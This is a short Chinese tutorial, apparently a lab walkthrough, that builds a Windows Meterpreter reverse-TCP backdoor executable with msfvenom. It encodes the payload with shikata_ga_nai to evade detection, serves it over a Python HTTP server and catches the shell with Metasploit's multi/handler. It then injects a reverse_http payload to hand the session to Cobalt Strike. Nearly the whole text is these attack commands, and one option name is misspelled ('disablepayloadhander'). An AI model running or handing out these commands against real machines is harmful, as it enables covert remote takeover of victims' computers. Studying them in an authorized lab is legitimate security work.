目录
kali操作系统
我这里是在虚拟机里面的windows10已经下载好msf的靶机。
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4567 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 5 -f exe -o payload.exe
python -m http.server
使用靶机下载恶意代码:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 监控IP
set lport 监控端口
run 执行
在靶机执行后门程序中等待返回 meterpreter
background
或者在命令行里面直接输入sessions,显示当前存在的session:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
show options(图一)
set lhost 192.168.0.2(设置cs服务器的地址,图二)
set lport 4567
set session 1(看情况而定)
set disablepayloadhander true
run
接下来就可以用cs进行实际操作!!!